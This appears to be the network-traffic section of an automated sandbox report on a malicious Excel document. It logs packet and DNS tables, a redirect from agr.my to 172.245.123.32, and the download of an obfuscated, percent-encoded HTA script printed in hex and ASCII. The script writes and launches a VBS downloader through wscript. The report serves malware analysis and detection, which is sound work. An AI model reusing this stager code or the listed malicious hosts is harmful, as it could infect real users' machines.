                                Mar 26, 2025 19:48:45.372335911 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372363091 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372431040 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.372443914 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372487068 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.389516115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389537096 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389590979 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.389602900 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389640093 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.406511068 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.406539917 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.406591892 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.406605959 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.406656027 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.428421021 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.428448915 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.428508043 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.428519011 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.428569078 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.442519903 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.442568064 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.442603111 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.442610979 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.442677021 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.463359118 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.463392019 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.463434935 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.463442087 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.463507891 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.477751970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.477792025 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.477833986 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.477849960 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.477880955 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.477902889 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.495114088 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.495147943 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.495198965 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.495212078 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.495260000 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.511135101 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.511164904 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.511210918 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.511219978 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.511250019 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.511267900 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.535200119 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.535229921 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.535290003 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.535310030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.535340071 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.535358906 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.551218987 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.551243067 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.551309109 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.551321983 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.551373959 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.564090014 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.564115047 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.564179897 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.564192057 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.564234972 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.580590963 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.580607891 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.580663919 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.580672026 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.580708981 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.595921993 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.595937967 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.596014977 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.596023083 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.596082926 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.619023085 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.619045973 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.619090080 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.619097948 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.619163036 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.639328003 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.639343977 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.639415026 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.639421940 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.639471054 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.652167082 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.652182102 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.652251005 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.652261019 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.652298927 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.666786909 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.666812897 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.666892052 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.666897058 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.666970015 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.679626942 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.679645061 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.679732084 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.679735899 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.679807901 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.682018995 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.682097912 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.682209969 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.682356119 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.682375908 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.682388067 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.682394981 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.284827948 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.284881115 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.285063982 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.285409927 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.285423040 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.290868044 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.290901899 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.290992022 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.291224003 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.291235924 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.563186884 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.570760965 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.583738089 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.583776951 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.592462063 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.592485905 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.593285084 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.593308926 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.594703913 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.594708920 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.742324114 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.742995024 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.743088007 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.743213892 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.743231058 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.743247986 CET49701443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.743253946 CET4434970113.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.755387068 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.755417109 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.755495071 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.755500078 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.755644083 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.767398119 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.767426014 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:51.767456055 CET49702443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:51.767468929 CET4434970213.107.246.41192.168.2.7
                                Mar 26, 2025 19:49:27.030004025 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:49:27.127535105 CET8049698172.245.123.32192.168.2.7
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 26, 2025 19:48:11.058974028 CET5365115162.159.36.2192.168.2.7
                                Mar 26, 2025 19:48:29.217129946 CET5346253192.168.2.71.1.1.1
                                Mar 26, 2025 19:48:29.305866003 CET53534621.1.1.1192.168.2.7
                                Mar 26, 2025 19:48:43.459641933 CET5919053192.168.2.71.1.1.1
                                Mar 26, 2025 19:48:43.547921896 CET53591901.1.1.1192.168.2.7
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Mar 26, 2025 19:48:29.217129946 CET192.168.2.71.1.1.10xc208Standard query (0)agr.myA (IP address)IN (0x0001)false
                                Mar 26, 2025 19:48:43.459641933 CET192.168.2.71.1.1.10x15dStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Mar 26, 2025 19:47:38.656852961 CET1.1.1.1192.168.2.70x9472No error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:47:38.656852961 CET1.1.1.1192.168.2.70x9472No error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:47:38.656852961 CET1.1.1.1192.168.2.70x9472No error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                                Mar 26, 2025 19:47:38.656852961 CET1.1.1.1192.168.2.70x9472No error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                                Mar 26, 2025 19:48:29.305866003 CET1.1.1.1192.168.2.70xc208No error (0)agr.my147.79.86.93A (IP address)IN (0x0001)false
                                Mar 26, 2025 19:48:43.547921896 CET1.1.1.1192.168.2.70x15dNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:48:43.547921896 CET1.1.1.1192.168.2.70x15dNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:48:43.547921896 CET1.1.1.1192.168.2.70x15dNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:48:43.547921896 CET1.1.1.1192.168.2.70x15dNo error (0)shed.dual-low.s-part-0013.t-0009.t-msedge.nets-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 26, 2025 19:48:43.547921896 CET1.1.1.1192.168.2.70x15dNo error (0)s-part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                • agr.my
                                • otelrules.svc.static.microsoft
                                • 172.245.123.32
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749698172.245.123.32806896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                Mar 26, 2025 19:48:30.293559074 CET251OUTGET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Connection: Keep-Alive
                                Host: 172.245.123.32
                                Mar 26, 2025 19:48:30.395308971 CET1031INHTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:30 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                Last-Modified: Wed, 26 Mar 2025 17:58:33 GMT
                                ETag: "17d1-6314295f8a8a9"
                                Accept-Ranges: bytes
                                Content-Length: 6097
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/hta
                                Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 6b 69 73 73 6d 65 2e 74 6b 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 30 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 34 35 25 37 38 25 36 35 25 36 33 25 37 35 25 37 34 25 36 31 25 37 32 25 32 30 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 34 38 25 35 34 25 34 31 25 33 41 25 34 31 25 35 [TRUNCATED]
                                Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by kissme.tk -->...document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%45%78%65%63%75%74%61%72%20%53%63%72%69%70%74%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%48%54%41%3A%41%50%50%4C%49%43%41%54%49%4F%4E%20%0A%20%20%20%20%20%20%20%20%41%50%50%4C%49%43%41%54%49%4F%4E%4E%41%4D%45%3D%22%53%63%72%69%70%74%45%78%65%63%75%74%6F%72%22%0A%20%20%20%20%20%20%20%20%42%4F%52%44%45%52%3D%22%6E%6F%6E%65%22%0A%20%20%20%20%20%20%20%20%43%41%50%54%49%4F%4E%3D%22%6E%6F%22%0A%20%20%20%20%20%20%20%20%53%48%4F%57%49%4E%54%41%53%4B%42%41%52%3D%22%6E%6F%22%0A%20%20%20
                                Mar 26, 2025 19:48:30.395324945 CET1031INData Raw: 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 33 25 34 39 25 34 45 25 34 37 25 34 43 25 34 35 25 34 39 25 34 45 25 35 33 25 35 34 25 34 31 25 34 45 25 34 33 25 34 35 25 33 44 25 32 32 25 37 39 25 36 35 25 37 33 25 32 32 25 30 41 25 32 30 25
                                Data Ascii: %20%20%20%20%20%53%49%4E%47%4C%45%49%4E%53%54%41%4E%43%45%3D%22%79%65%73%22%0A%20%20%20%20%20%20%20%20%57%49%4E%44%4F%57%53%54%41%54%45%3D%22%6D%69%6E%69%6D%69%7A%65%22%0A%20%20%20%20%2F%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%6C%61%6E%67%75
                                Mar 26, 2025 19:48:30.395339012 CET1031INData Raw: 34 25 32 38 25 32 32 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 36 39 25 36 45 25 36 37 25 32 45 25 34 36 25 36 39 25 36 43 25 36 35 25 35 33 25 37 39 25 37 33 25 37 34 25 36 35 25 36 44 25 34 46 25 36 32 25 36 41 25 36 35 25 36 33
                                Data Ascii: 4%28%22%53%63%72%69%70%74%69%6E%67%2E%46%69%6C%65%53%79%73%74%65%6D%4F%62%6A%65%63%74%22%29%0A%20%20%20%20%20%20%20%20%53%65%74%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%20%3D%20%63%6F%6D%6D%69%74%74%65%65%73%2E%43%72%65%61%74%65%54%65%78%74%4
                                Mar 26, 2025 19:48:30.395351887 CET1031INData Raw: 37 34 25 36 31 25 36 45 25 36 31 25 37 33 25 32 45 25 37 36 25 36 32 25 37 33 25 32 32 25 32 32 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 37 30 25 36 35 25 36 33 25 37 34 25 37 32 25 36
                                Data Ascii: 74%61%6E%61%73%2E%76%62%73%22%22%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22%65%63%68%6F%20%44%69%6D%20%6E%6F%6E%63%61%74%61%6C%6F%67%2C%20%64%6F%63%75%6D%65%6E%74%61%72%69%73%74%20%
                                Mar 26, 2025 19:48:30.395394087 CET1031INData Raw: 25 37 33 25 37 34 25 32 45 25 36 46 25 37 30 25 36 35 25 36 45 25 32 30 25 32 32 25 32 32 25 34 37 25 34 35 25 35 34 25 32 32 25 32 32 25 32 43 25 32 30 25 36 45 25 36 46 25 36 45 25 36 33 25 36 31 25 37 34 25 36 31 25 36 43 25 36 46 25 36 37 25
                                Data Ascii: %73%74%2E%6F%70%65%6E%20%22%22%47%45%54%22%22%2C%20%6E%6F%6E%63%61%74%61%6C%6F%67%2C%20%46%61%6C%73%65%20%3E%3E%20%25%66%75%67%75%65%73%25%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22
                                Mar 26, 2025 19:48:30.395407915 CET1031INData Raw: 36 25 32 30 25 33 45 25 33 45 25 32 30 25 32 35 25 36 36 25 37 35 25 36 37 25 37 35 25 36 35 25 37 33 25 32 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 37 30 25 36 35 25 36 33 25 37 34
                                Data Ascii: 6%20%3E%3E%20%25%66%75%67%75%65%73%25%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22%73%74%61%72%74%20%22%22%22%22%20%2F%62%20%77%73%63%72%69%70%74%20%2F%2F%6E%6F%6C%6F%67%6F%20%22%22%2
                                Mar 26, 2025 19:48:30.395420074 CET228INData Raw: 37 33 25 36 35 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 37 25 36 39 25 36 45 25 36 34 25 36 46 25 37 37 25 32 45 25 36 33 25 36 43 25 36 46 25 37 33 25 36 35 25 30 41 25 32 30 25 32 30 25 32 30 25 32
                                Data Ascii: 73%65%0A%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%63%6C%6F%73%65%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));//--></Script>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749697147.79.86.934436896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-26 18:48:29 UTC209OUTGET /vJcD8F?&silk=enthusiastic HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: agr.my
                                Connection: Keep-Alive
                                2025-03-26 18:48:30 UTC463INHTTP/1.1 302 Found
                                Content-Length: 103
                                Content-Type: text/plain; charset=utf-8
                                Date: Wed, 26 Mar 2025 18:48:30 GMT
                                Location: http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal
                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                Vary: Accept
                                X-Content-Type-Options: nosniff
                                X-Dns-Prefetch-Control: off
                                X-Download-Options: noopen
                                X-Frame-Options: SAMEORIGIN
                                X-Xss-Protection: 1; mode=block
                                Connection: close
                                2025-03-26 18:48:30 UTC103INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 33 32 2f 78 61 6d 70 70 2f 6b 6f 62 73 2f 6b 75 6b 6d 61 6b 69 6e 67 62 65 73 74 63 72 7a 79 74 68 69 6e 67 73 69 6e 6d 79 6c 69 66 65 2e 68 74 61 3f 26 6c 69 67 68 74 3d 72 6f 79 61 6c
                                Data Ascii: Found. Redirecting to http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.74969913.107.246.414436896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-26 18:48:43 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:44 UTC493INHTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:43 GMT
                                Content-Type: text/plain
                                Content-Length: 1114783
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public
                                Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                                ETag: "0x8DD6AD97FEF19EF"
                                x-ms-request-id: c143ef55-001e-005a-3b72-9ec3d0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184843Z-17cccd5449bg7c4bhC1EWR84740000000hdg00000000dhec
                                x-fd-int-roxy-purgeid: 0
                                X-Cache-Info: L1_T2
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2025-03-26 18:48:44 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                2025-03-26 18:48:44 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
